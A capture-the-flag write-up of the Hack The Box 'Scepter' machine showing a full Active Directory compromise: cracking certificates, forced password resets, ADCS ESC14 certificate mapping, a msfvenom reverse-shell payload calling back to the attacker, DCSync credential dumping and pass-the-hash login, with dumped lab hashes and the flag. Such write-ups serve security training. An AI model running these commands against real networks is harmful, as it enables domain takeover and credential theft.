🌙Scepter

https://app.hackthebox.com/machines/Scepter

Recon

Using the htbscan from Scripts/Functions/Tools

[+] Starting recon on 10.10.11.65 (scepter)                                                                                                                                                                                                
[*] Running initial Nmap scan...                                                                                     
sudo nmap -sCV -T4 10.10.11.65 -oA nmap-initial 
[sudo] password for kali:                                                                                            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 21:26 CEST
Nmap scan report for 10.10.11.65       
Host is up (0.020s latency).                                                                                         
Not shown: 985 closed tcp ports (reset)    
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus                                                                         
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-05 03:28:13Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)                                                                       
| rpcinfo:  
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind      
|   100000  2,3,4        111/tcp6  rpcbind      
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs     
|   100003  2,3         2049/udp6  nfs                                                                               
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd                                                                            
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status                                                                            
|   100024  1           2049/tcp6  status                                                                            
|   100024  1           2049/udp   status  
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn 
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
445/tcp  open  microsoft-ds?            
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33                                                                              
|_Not valid after:  2025-11-01T03:22:33                                                                              
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33   
|_Not valid after:  2025-11-01T03:22:33   
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
|_http-title: Not Found               
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                                                                                              
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| tls-alpn:                              
|_  http/1.1                             
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41    
|_Not valid after:  2025-11-01T00:41:41    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows                                                 

Adding the domain-controller to our hosts as well.(The latest version of htbscan should do this as well)

<machineip> scepter.htb dc01.scepter.htb

NFS Server

We find some certificates on that NFS Server and a key as well. Mount it to /tmp

➜ showmount -e 10.10.11.65    
Export list for 10.10.11.65:
/helpdesk (everyone)
➜ mkdir nfs
➜ sudo mount -t nfs 10.10.11.65:/helpdesk nfs 
➜ sudo ls -lha nfs
total 21K
drwx------ 2 4294967294 4294967294   64 Nov  2  2024 .
drwx------ 2 4294967294 4294967294   64 Nov  2  2024 ..
-rwx------ 1 4294967294 4294967294 2.5K Nov  2  2024 baker.crt
-rwx------ 1 4294967294 4294967294 2.0K Nov  2  2024 baker.key
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 clark.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 lewis.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 scott.pfx

User

We gonna try to crack these certificates using john

➜ scepter sudo pfx2john nfs/lewis.pfx | tee -a helpdesk/lewishash
lewis.pfx:$pfxng$256$32$2048$8$2ae7b9f39c9e4fb3$30820c8e308206fa06092a86<snipped>
➜ scepter john --wordlist=/usr/share/wordlists/rockyou.txt helpdesk/lewishash 
[...]
newpassword      (lewis.pfx)     

With that password we are able to generate a pfx for baker without any password, just hit enter. Moreover changing owner- and groupchip.

➜ sudo openssl pkcs12 -export -out baker.pfx -inkey nfs/baker.key -in nfs/baker.crt -passin pass:newpassword                          

Enter Export Password:
Verifying - Enter Export Password:
➜ sudo chown kali:kali baker.pfx 

Syncing our clock(not necessary needed twice) and getting the cert.

➜ sudo ntpdate 10.10.11.65
➜ sudo ntpdate 10.10.11.65 | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.11.65                       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: d.baker@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Now we ned to add the domain-controller to our resolver and using the hash with bloodhound to get some overview how we can escalate further

etc/resolv.conf

nameserver 10.10.11.65

/etc/krb5.conf

[domain_realm]
    .scepter.htb = SCEPTER.HTB
    scepter.htb = SCEPTER.HTB

[libdefaults]
    default_realm = SCEPTER.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    forwardable = true

[realms]
    SCEPTER.HTB = {
        kdc = dc01.scepter.htb
        admin_server = dc01.scepter.htb
        default_domain = scepter.htb

➜ sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250508084312_bloodhound.zip

Checking our results with bloodhound for kali.

If you haven't installed it already here are the steps:

➜ sudo apt -y install bloodhound                                                                              │
Installing:                                                                                                           │
  bloodhound                                                                                                          │
                                                                                                                      │
Installing dependencies:                                                                                              │
  binfmt-support  fastjar  jarwrapper  neo4j 
  

Starting neo4j then open the link and change the password. Afterwards we start bloodhound in a new terminal and just dropping our zip-file. When th eimport is done we can use the search

➜ sudo neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
[..]
2025-05-08 06:55:32.179+0000 INFO  Bolt enabled on localhost:7687.
2025-05-08 06:55:32.856+0000 INFO  Remote interface available at http://localhost:7474/
[open browser and change password]

➜ bloodhound 
[drop zip-file into bloodhound]

When we enter the User Baker at search, select him and check shortest path

After this we gonna check these nodes, when we right click Carter we see some interesting action "ForceChangePassword"

So let's do this.

➜ impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: Password123
Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Another bloodhound check with these new credentials and user

➜ sudo bloodhound-python -u 'a.carter' -p 'Password123' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250508083614_bloodhound.zip

We are now in a group called staff access certificate

ADCS ESC14 Abuse TechniqueMedium

➜ scepter impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
                                                           
New password:                                 
Retype new password:                        
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker                                  
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
➜ scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-Password123 -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
                                                           
usage: getTGT.py [-h] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-service SPN] [-principalType [PRINCIPALTYPE]] identity
getTGT.py: error: unrecognized arguments: -no-Password123
➜ scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                
                                                           
[*] Saving ticket in d.baker@dc01.scepter.htb.ccache                                                                  
➜ scepter export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
[+] Password changed successfully!          
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter

[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb

[+] d.baker's mail has been updated
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown                                                                                  

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: h.brown@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
➜ scepter export KRB5CCNAME=./h.brown.ccache  

➜ scepter sudo ntpdate -u 10.10.11.65 
2025-05-15 01:21:51.653867 (+0200) +28798.893693 +/- 0.009609 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.893693
➜ scepter evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Warning: User is not needed for Kerberos auth. Ticket will be used
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> 

Enter password 'Password123' at the beginning

Copy+Paste

impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'

sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb

sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown

export KRB5CCNAME=./h.brown.ccache  

sudo ntpdate -u 10.10.11.65     

evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown

Root

Getting a stable meterpreter-sesssion. Creatin our payload with msfvenom, starting our listener in metesploit.

change <ip>

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4243 -f exe -o shell.exe

➜ scepter msfconsole 
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v6.4.50-dev                          ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post       ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4243
lport => 4243
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -j

Uploading our payload and executing it

*Evil-WinRM* PS C:\Users\h.brown\Downloads> upload shell.exe
                                        
Info: Uploading /mnt/e/hacking/hackthebox/Machines/scepter/shell.exe to C:\Users\h.brown\Downloads\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\h.brown\Downloads> ./shell.exe
*Evil-WinRM* PS C:\Users\h.brown\Downloads> 

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  SCEPTER\h.brown @ DC01  <ip>:4243 -> 10.10.11.65:52384 (10.10.11.65)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

Creating a new computer and analyzing the x509

➜ sudo ntpdate -u 10.10.11.65 | bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123' --dc-ip 10.10.11.65 add computer meow 'Password123'
[+] meow created
➜ certipy-ad req -ca scepter-DC01-CA -template Machine -target 10.10.11.65 -username meow$ -password 'Password123'                          
Certipy v4.8.2 - by Oliver Lyak (ly4k)
                                                           
[*] Requesting certificate via RPC                 
[*] Successfully requested certificate 
[*] Request ID is 11                                                                                                  
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9102'
[*] Saved certificate and private key to 'meow.pfx'
➜ certipy-ad cert -pfx meow.pfx -nokey -out "meow.crt"
Certipy v4.8.2 - by Oliver Lyak (ly4k)                  
                                                           
[*] Writing certificate and  to 'meow.crt'
➜ openssl x509 -in meow.crt -noout -text                                                                      
Certificate:                                                                                                          
    Data:                                                                                                             
        Version: 3 (0x2)                                                                                              
        Serial Number:                                                                                                
            62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e
        Signature Algorithm: sha256WithRSAEncryption                                                                  
        Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA  
    [...]                     

Adding meow.scepter.htb to our hosts-file

conv.py

# conv.py
import sys
from binascii import unhexlify

def parse_serial(hex_serial):
    # remove colons and reverse byte order
    hex_serial = hex_serial.replace(":", "")
    bytes_reversed = [hex_serial[i:i+2] for i in range(0, len(hex_serial), 2)][::-1]
    return ''.join(bytes_reversed).lower()

def format_altsecid(issuer, serial):
    issuer_parts = issuer.split(',')
    issuer_parts = [p.strip() for p in issuer_parts[::-1]]
    issuer_formatted = ','.join(issuer_parts)
    return f'X509:<I>{issuer_formatted}<SR>{parse_serial(serial)}'

if __name__ == "__main__":
    serial = sys.argv[sys.argv.index("-serial")+1]
    issuer = sys.argv[sys.argv.index("-issuer")+1]
    print(format_altsecid(issuer, serial))

Replace Serial Number ^

➜ python3 conv.py -serial '62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'

X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062

meterpreter Session

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4992 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\h.brown\Downloads>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\h.brown\Downloads> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
$map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
PS C:\Users\h.brown\Downloads> Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}

➜ sudo ntpdate -u 10.10.11.65                                                                                
2025-05-15 02:12:39.713454 (+0200) +28798.933465 +/- 0.009446 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.933465

➜ sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] The provided username does not match the identification found in the provided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: p.adams@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0


➜ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@10.10.11.65
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up... 

[*] Cleaning up... 
➜ evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb7063f998324a7fe9d129f6f6db3d32
*Evil-WinRM* PS C:\Users\Administrator\Desktop>